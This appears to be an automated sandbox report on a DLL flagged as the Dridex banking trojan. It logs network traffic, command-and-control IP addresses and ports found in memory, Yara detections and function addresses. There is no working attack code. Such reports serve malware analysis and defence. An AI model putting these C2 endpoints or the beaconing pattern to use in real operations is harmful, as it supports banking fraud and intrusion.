Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:46:44 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:46:48 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:46:48 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:46:52 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:46:52 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:46:56 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:46:56 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:00 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:00 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:04 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:04 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:08 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:08 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:12 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:12 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:16 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:17 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:20 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:21 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:24 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:26 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:28 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:30 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:32 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:34 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:36 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:38 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:40 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:42 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:44 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:46 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:48 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:51 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:53 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:55 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:57 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:47:59 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:48:01 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000004.00000003.393252545.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?05d49d65b62de
Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214/
Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.575651265.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.778016005.000000000099D000.00000004.00000020.sdmp | String found in binary or memory: https://143.244.140.214:808/
Source: loaddll32.exe, 00000000.00000003.618146216.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/%
Source: loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/(
Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/.140.214:808/hy
Source: loaddll32.exe, 00000000.00000003.660175642.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/:
Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/My
Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/X
Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/em32
Source: loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/frthe.computer
Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/g_
Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/h
Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/k
                      Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: loaddll32.exe, 00000000.00000003.583869390.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l3
                      Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/la
                      Source: loaddll32.exe, 00000000.00000003.618146216.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.668641353.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.700253725.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.660175642.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://145.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.408320387.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/Wl
                      Source: rundll32.exe, 00000004.00000002.785394155.00000000035BD000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/(
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.457343535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/2
                      Source: loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4&b
                      Source: loaddll32.exe, 00000000.00000003.668641353.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/h
                      Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4h
                      Source: loaddll32.exe, 00000000.00000003.700253725.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: loaddll32.exe, 00000000.00000003.583869390.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ub
                      Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/b
                      Source: loaddll32.exe, 00000000.00000003.600285042.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/fW
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/h
                      Source: loaddll32.exe, 00000000.00000003.408320387.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll
                      Source: loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll8b
                      Source: loaddll32.exe, 00000000.00000003.609859133.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/llUb
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/oft
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.542004971.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000002.780745160.00000000033C0000.00000004.00000001.sdmpString found in binary or memory: https://19.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.778016005.000000000099D000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: rundll32.exe, 00000004.00000002.773821588.0000000000FCC000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/(u1
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/4l
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/=l
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/El
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Nl
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/O
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Pl
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/R
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Wl
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Yl
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll4
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/al
                      Source: loaddll32.exe, 00000000.00000003.457343535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/coro8
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/en-US
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/f
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/jl
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/k
                      Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: loaddll32.exe, 00000000.00000003.575651265.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/sl
                      Source: loaddll32.exe, 00000000.00000002.780745160.00000000033C0000.00000004.00000001.sdmpString found in binary or memory: https://195.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000002.778016005.000000000099D000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/0
                      Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/6/
                      Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Sg
                      Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll
                      Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/sg
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED639F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49757 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:50023 version: TLS 1.2

E-Banking Fraud:

Yara detected Dridex unpacked file
Source: Yara match | File source: 4.2.rundll32.exe.6ed30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.f3db55.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.83db55.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.rundll32.exe.129db55.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.33fdb55.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.rundll32.exe.129db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.83db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.6ed30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.f3db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.33fdb55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.3.rundll32.exe.e4db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.3.rundll32.exe.e4db55.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000003.341889397.00000000033E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.791906460.000000006ED31000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.390619959.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.369249349.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.340472911.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.387507409.0000000000E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.815931183.000000006ED31000.00000020.00020000.sdmp, type: MEMORY
Detected Dridex e-Banking trojan
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED351A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
Source: SecuriteInfo.com.Variant.Razy.980776.4470.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED467C8
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED36AD0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED496D0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED5FA10
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED53EC0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4B6F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED48EF0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED562F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4F6E0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4AE80
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED48AB0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED526B0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED51EB0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED51240
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED49E70
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4A660
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED57660
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED52E60
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED3CA10
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED5FA10
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED50220
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED5D620
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED483C0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED47FC0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED57FC0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4E3F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4BF50
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED59B10
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED53B00
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED51730
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED3ACD0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4A0D0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED498DA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED488C0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED48CC0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED55CB0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4E0A0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED54CA0
